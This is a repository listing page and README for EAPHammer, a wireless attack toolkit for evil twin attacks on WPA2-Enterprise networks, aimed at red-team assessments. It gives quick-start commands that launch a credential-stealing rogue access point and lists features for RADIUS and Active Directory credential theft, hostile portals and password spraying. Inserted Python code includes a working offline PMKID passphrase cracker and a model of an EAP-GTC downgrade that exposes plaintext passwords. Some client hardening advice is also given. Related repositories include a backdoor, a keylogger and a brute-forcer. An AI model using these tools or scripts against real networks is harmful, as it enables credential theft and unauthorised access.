  • Stars: 2,006
  • Rank: 22,924 (Top 0.5 %)
  • Language: C
  • License: GNU General Publi...
  • Created over 7 years ago
  • Updated 6 months ago

Repository Details

Targeted evil twin attacks against WPA2-Enterprise networks. Indirect wireless pivots using hostile portal attacks.

by Gabriel Ryan (s0lst1c3)(gabriel[at]solstice|d0t|sh)

Current release: v1.13.5

Supports Python 3.5+.

Overview

EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such, focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate just how fast this tool is, the Quick Start section below shows how to execute a credential stealing evil twin attack against a WPA/2-EAP network in a handful of commands.

Disclaimer

EAPHammer (the "Software") and associated documentation is provided "AS IS". The Developer makes no other warranties, express or implied, and hereby disclaims all implied warranties, including any warranty of merchantability and warranty of fitness for a particular purpose. Any actions or activities related to the use of the Software are the sole responsibility of the end user. The Developer will not be held responsible in the event that any criminal charges are brought against any individuals using or misusing the Software. It is up to the end user to use the Software in an authorized manner and to ensure that their use complies with all applicable laws and regulations.

Quick Start Guide - Kali

Begin by cloning the eaphammer repo using the following command:

git clone https://github.com/s0lst1c3/eaphammer.git

Next, run the kali-setup script as shown below to complete the eaphammer setup process. This will install dependencies and compile the project:

./kali-setup

To set up and execute a credential stealing evil twin attack against a WPA/2-EAP network:

# generate certificates
./eaphammer --cert-wizard

# launch attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

Quick Start Guide - Parrot OS (Security)

Begin by cloning the eaphammer repo using the following command:

git clone https://github.com/s0lst1c3/eaphammer.git

Next, run the parot-setup script as shown below to complete the eaphammer setup process. This will install dependencies and compile the project:

./parot-setup

To set up and execute a credential stealing evil twin attack against a WPA/2-EAP network:

# generate certificates
./eaphammer --cert-wizard

# launch attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

Usage and Setup Instructions

For complete usage and setup instructions, please refer to the project's wiki.

Features

  • Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks.
  • Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots
  • Perform captive portal attacks
  • Built-in Responder integration
  • Support for Open networks and WPA-EAP/WPA2-EAP
  • No manual configuration necessary for most attacks.
  • No manual configuration necessary for installation and setup process
  • Leverages hostapd 2.8
  • Support for evil twin and karma attacks
  • Generate timed Powershell payloads for indirect wireless pivots
  • Integrated HTTP server for Hostile Portal attacks
  • Support for SSID cloaking
  • Fast and automated PMKID attacks against PSK networks using hcxtools
  • Password spraying across multiple usernames against a single ESSID
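The PMKID attack listed above works because an AP that supports PMKSA caching places a PMKID in the first EAPOL frame of the 4-way handshake, and that value is a keyed hash of the PMK, which for a PSK network is derived from the passphrase alone. The following added example (not EAPHammer or hcxtools code) derives the PMK and PMKID as specified in IEEE 802.11 (PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32); PMKID = HMAC-SHA1(PMK, "PMK Name" || AP MAC || STA MAC) truncated to 128 bits), emits the PMKID*APMAC*STAMAC*ESSIDHEX line format that hcxpcaptool produces for hashcat mode 16800, and runs an offline wordlist check against such a line. The MAC addresses, SSID, passphrase and candidate list are constructed for the example; the "password"/"IEEE" vector used in the demo is the published 802.11 PSK test vector.

```python
"""PMK / PMKID derivation and an offline passphrase check for WPA/2-PSK.

Added example, not project code. Follows the IEEE 802.11 definitions of the
PMK (PBKDF2-HMAC-SHA1 over the passphrase and SSID) and the PMKID
(HMAC-SHA1-128 over "PMK Name" || AA || SPA). Sample MACs, SSID, passphrase
and wordlist are constructed for illustration.
"""
import hashlib
import hmac


def derive_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk, ap_mac, sta_mac):
    """PMKID = first 128 bits of HMAC-SHA1(PMK, "PMK Name" || AP MAC || STA MAC)."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def mac_bytes(text):
    """'00:11:22:33:44:55' -> 6 raw bytes."""
    return bytes.fromhex(text.replace(":", "").replace("-", ""))


def hashcat_16800_line(pmkid, ap_mac, sta_mac, ssid):
    """Legacy hashcat -m 16800 input line: PMKID*APMAC*STAMAC*ESSIDHEX."""
    return "*".join([pmkid.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex()])


def crack_pmkid(line, candidates):
    """Recompute the PMKID for each candidate passphrase; return the match or None.

    Each candidate costs one PBKDF2 run (4096 HMAC-SHA1 rounds), which is the
    whole cost of the attack: no client, no handshake, no deauth needed.
    """
    pmkid_hex, ap_hex, sta_hex, ssid_hex = line.split("*")
    ap_mac, sta_mac = bytes.fromhex(ap_hex), bytes.fromhex(sta_hex)
    ssid = bytes.fromhex(ssid_hex).decode()
    target = bytes.fromhex(pmkid_hex)
    for candidate in candidates:
        guess = compute_pmkid(derive_pmk(candidate, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(guess, target):
            return candidate
    return None


if __name__ == "__main__":
    # Published 802.11 test vector: passphrase "password", SSID "IEEE".
    print("PMK(password, IEEE) =", derive_pmk("password", "IEEE").hex())
    # Constructed capture: the AP at 00:11:... answered a STA at 66:77:...
    ap, sta = mac_bytes("00:11:22:33:44:55"), mac_bytes("66:77:88:99:aa:bb")
    pmkid = compute_pmkid(derive_pmk("CorpSecret", "CorpWifi"), ap, sta)
    line = hashcat_16800_line(pmkid, ap, sta, "CorpWifi")
    print("captured:", line)
    print("recovered:", crack_pmkid(line, ["password", "letmein", "CorpSecret"]))
```

Two caveats the feature bullet leaves implicit: the attack only applies to WPA/2-PSK (WPA3-SAE derives the PMK from the Dragonfly exchange, not from PBKDF2 over the passphrase, so the PMKID is useless offline), and a PMKID is only worth as much as the passphrase is weak, since every guess costs a full 4096-round PBKDF2.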

New (as of Version 1.13.5, latest):

EAPHammer now has a modular captive portal with keylogging and payload delivery capabilities, as well as an integrated website cloner for easily creating portal modules.

WPA/2-PSK handshake captures (added as of Version 1.7.0)

EAPHammer now supports rogue AP attacks against WPA/2-PSK networks, including capturing the WPA handshake from connecting clients.

OWE (added as of Version 1.5.0):

EAPHammer now supports rogue AP attacks against OWE and OWE-Transition mode networks.

PMF (added as of Version 1.4.0)

EAPHammer now supports 802.11w (Protected Management Frames), Loud Karma attacks, and Known Beacon attacks (documentation coming soon).

GTC Downgrade Attacks

EAPHammer will now automatically attempt a GTC downgrade attack against connecting clients: inside the TLS tunnel it offers EAP-GTC as the inner authentication method instead of a challenge/response method, and a client that accepts it sends its password in plaintext to the rogue server (see: https://www.youtube.com/watch?v=-uqTqJwTFyU&feature=youtu.be&t=22m34s).

Improved Certificate Handling

EAPHammer's Cert Wizard has been expanded to provide users with the ability to create, import, and manage SSL certificates in a highly flexible manner. Cert Wizard's previous functionality has been preserved as Cert Wizard's Interactive Mode, which uses the same syntax as previous versions. See XIV - Cert Wizard for additional details.

TLS / SSL Backwards Compatibility

EAPHammer now uses a local build of libssl that exists independently of the systemwide install. This local version is compiled with support for SSLv3, allowing EAPHammer to be used against legacy clients without re-enabling SSLv3 in the attacker's system-wide OpenSSL.

Supported EAP Methods

EAPHammer supports the following EAP methods:

  • EAP-PEAP/MSCHAPv2
  • EAP-PEAP/GTC
  • EAP-PEAP/MD5
  • EAP-TTLS/PAP
  • EAP-TTLS/MSCHAP
  • EAP-TTLS/MSCHAPv2
  • EAP-TTLS/MSCHAPv2 (no EAP)
  • EAP-TTLS/CHAP
  • EAP-TTLS/MD5
  • EAP-TTLS/GTC
  • EAP-MD5
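To make the GTC downgrade described above concrete against the method list just given, here is an added example (not EAPHammer code) that models the inner EAP exchange between a rogue server and a supplicant. It serialises and parses EAP packets with the RFC 3748 layout (Code, Identifier, Length, Type, Type-Data) using the IANA type numbers for the methods on this page (MD5 = 4, GTC = 6, TTLS = 21, PEAP = 25, MSCHAPv2 = 26), and shows the two outcomes when the server asks for GTC first: a client whose inner-method policy permits GTC answers with the password as Type-Data, while a client pinned to MSCHAPv2 replies with a legacy Nak (Type 3) listing the methods it will run. The TLS tunnel that wraps this exchange in PEAP/TTLS is abstracted away, and the client policies and password are constructed for the example.

```python
"""EAP inner-method negotiation, modelling the GTC downgrade.

Added example, not EAPHammer code. Packet layout per RFC 3748; method type
numbers per the IANA EAP registry. The PEAP/TTLS tunnel is not modelled: the
packets below are what travels inside it. Client policies and the password
are constructed for illustration.
"""
import struct

EAP_REQUEST, EAP_RESPONSE = 1, 2
TYPE_IDENTITY, TYPE_NAK, TYPE_MD5, TYPE_GTC = 1, 3, 4, 6
TYPE_TTLS, TYPE_PEAP, TYPE_MSCHAPV2 = 21, 25, 26


def build_eap(code, identifier, eap_type, type_data=b""):
    """Serialise one EAP packet: Code(1) Identifier(1) Length(2) Type(1) Type-Data."""
    length = 5 + len(type_data)  # Length covers the whole packet, header included
    return struct.pack("!BBHB", code, identifier, length, eap_type) + type_data


def parse_eap(pkt):
    """Parse an EAP packet into a dict; reject a Length field that disagrees with the wire."""
    if len(pkt) < 5:
        raise ValueError("EAP packet shorter than its 5-byte header")
    code, identifier, length, eap_type = struct.unpack("!BBHB", pkt[:5])
    if length != len(pkt):
        raise ValueError("EAP Length %d != %d bytes received" % (length, len(pkt)))
    return {"code": code, "id": identifier, "type": eap_type, "data": pkt[5:length]}


def client_answer(request, allowed_inner, password):
    """Supplicant's reply to an inner-method Request.

    allowed_inner is the set of inner methods the client will run (the role of
    wpa_supplicant's phase2="auth=..." setting). An allowed method is answered;
    for GTC that answer *is* the password. Anything else draws a legacy Nak
    whose Type-Data lists the acceptable method numbers.
    """
    req = parse_eap(request)
    if req["code"] != EAP_REQUEST:
        raise ValueError("expected an EAP Request")
    if req["type"] in allowed_inner:
        if req["type"] == TYPE_GTC:
            # EAP-GTC: Request carries a prompt, Response carries the typed secret.
            return build_eap(EAP_RESPONSE, req["id"], TYPE_GTC, password.encode())
        # Challenge/response methods never put the password itself on the wire;
        # a placeholder stands in for the response derived from it.
        return build_eap(EAP_RESPONSE, req["id"], req["type"], b"<challenge-response>")
    return build_eap(EAP_RESPONSE, req["id"], TYPE_NAK, bytes(sorted(allowed_inner)))


def rogue_inner_exchange(allowed_inner, password="S3cret!"):
    """The evil twin's first move inside the tunnel: ask for GTC. Report what leaks."""
    request = build_eap(EAP_REQUEST, 7, TYPE_GTC, b"Password: ")
    reply = parse_eap(client_answer(request, allowed_inner, password))
    if reply["type"] == TYPE_GTC:
        return {"outcome": "plaintext", "leaked": reply["data"].decode()}
    return {"outcome": "nak", "client_accepts": list(reply["data"])}


if __name__ == "__main__":
    print("lax client   :", rogue_inner_exchange({TYPE_MSCHAPV2, TYPE_GTC}))
    print("pinned client:", rogue_inner_exchange({TYPE_MSCHAPV2}))
```

The Nak is the only thing standing between a permissive client and a plaintext password, which is why the fix on the client side is policy rather than protocol: in wpa_supplicant terms, set phase2="auth=MSCHAPV2" so GTC is never accepted as an inner method, and set ca_cert together with domain_suffix_match (or domain_match) so the rogue server's certificate is rejected before any inner exchange starts at all.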

802.11a and 802.11n Support

EAPHammer now supports attacks against 802.11a and 802.11n networks. This includes the ability to create access points that support the following features:

  • Both 2.4 GHz and 5 GHz channel support
  • Full MIMO support (multiple input, multiple output)
  • Frame aggregation
  • Support for 40 MHz channel widths using channel bonding
  • High Throughput Mode
  • Short Guard Interval (Short GI)
  • Modulation & coding scheme (MCS)
  • RIFS
  • HT power management

Upcoming Features

  • Perform seamless MITM attacks with partial HSTS bypasses
  • Directed rogue AP attacks (deauth then evil twin from PNL, deauth then karma + ACL)
  • Integrated website cloner for cloning captive portal login pages
  • Integrated HTTP server for captive portals

Contributing

Contributions are encouraged and more than welcome. Please attempt to adhere to the provided issue and feature request templates.

Versioning

We use SemVer for versioning (or at least make an effort to). For the versions available, see https://github.com/s0lst1c3/eaphammer/releases.

License

This project is licensed under the GNU General Public License 3.0 - see the LICENSE.md file for details.

Acknowledgments

This tool either builds upon, is inspired by, or directly incorporates nearly fifteen years of prior research and development from the following awesome people:

  • Brad Antoniewicz
  • Joshua Wright
  • Robin Wood
  • Dino Dai Zovi
  • Shane Macaulay
  • Dominic White
  • Ian de Villiers
  • Michael Kruger
  • Moxie Marlinspike
  • David Hulton
  • Josh Hoover
  • James Snodgrass
  • Adam Toscher
  • George Chatzisofroniou
  • Mathy Vanhoef

For a complete description of what each of these people has contributed to the current wireless security landscape and this tool, please see:

EAPHammer leverages a modified version of hostapd-wpe (shoutout to Brad Anton for creating the original), dnsmasq, asleap, hcxpcaptool and hcxdumptool for PMKID attacks, Responder, and Python 3.5+.

Finally, huge shoutout to the SpecterOps crew for supporting this project and being a constant source of inspiration.

More Repositories

  • silentbridge (C, 218 stars): Silentbridge is a toolkit for bypassing 802.1x-2010 and 802.1x-2004.
  • dropengine (Python, 206 stars): DropEngine provides a malleable framework for creating shellcode runners, allowing operators to choose from a selection of components and combine them to create highly sophisticated payloads within seconds.
  • sentrygun (Python, 87 stars): Rogue AP killer
  • evil_twin (Python, 37 stars): Python script for performing basic Evil Twin attacks on open wifi networks. Written for my tutorial on the subject.
  • grey_harvest (Python, 34 stars): Scrapes the web for reliable http or https proxies and prints them to stdout. Can also be used as a python library to easily generate reliable proxies for use within Python applications.
  • SharpFinder (C#, 30 stars)
  • awae (Python, 16 stars)
  • sentrygun-server (Python, 14 stars)
  • rudydos (Python, 13 stars): RUDY DOS attack script
  • keyboardsnitch (Python, 12 stars)
  • s0lst1c3.github.io (CSS, 11 stars)
  • hostapd-eaphammer (C, 6 stars): [DEPRECATED UNTIL FURTHER NOTICE... use hostapd from s0lst1c3/eaphammer repo] Hostapd 2.6 patched with a trimmed version of hostapd-wpe for use in eaphammer
  • custom-ssh-backdoor (Python, 5 stars): Custom ssh backdoor, coded in python using Paramiko
  • allthecookies (Shell, 5 stars)
  • osx_mic_record (Objective-C, 4 stars): Small command-line utility for recording audio using the builtin MacOS webcam mic.
  • bind_cannon (Python, 3 stars): Asynchronous SSH bruteforcer written in Python 2.7 with parallel processing.
  • hello.asm (Assembly, 3 stars): Hello world in x86 nasm
  • GhostalService (Python, 3 stars): A mass emailer with 'from' header spoofing. Python 3.4.
  • zot.li (Python, 3 stars)
  • administration (Shell, 2 stars)
  • mongodumper (Python, 2 stars)
  • awae-ad-setup-scripts (PowerShell, 2 stars)
  • txlab-ssh-callhome-scripts (Python, 2 stars)
  • RomanNumerals (JavaScript, 2 stars): Simple javascript app that uses a stack based algorithm to convert roman numerals to base-10 ints.
  • owe-lab (Python, 2 stars)
  • hostap-owe (C, 1 star)
  • RawBytes (C++, 1 star): Simple mutable raw byte array written in C
  • proxychains_autoconf (1 star): Automagically generate a reliable proxylist for your proxychains.conf file
  • gamewarden (Python, 1 star)
  • dotify (Shell, 1 star)
  • benfords-law (Python, 1 star): Fraud detection script in homage of the methods used by the IRS
  • stdez (C, 1 star): Library for things I find myself doing a lot
  • arpsiege (Python, 1 star)
  • keylogger (Python, 1 star)
  • smf-gremlin (Python, 1 star): SMF password cracker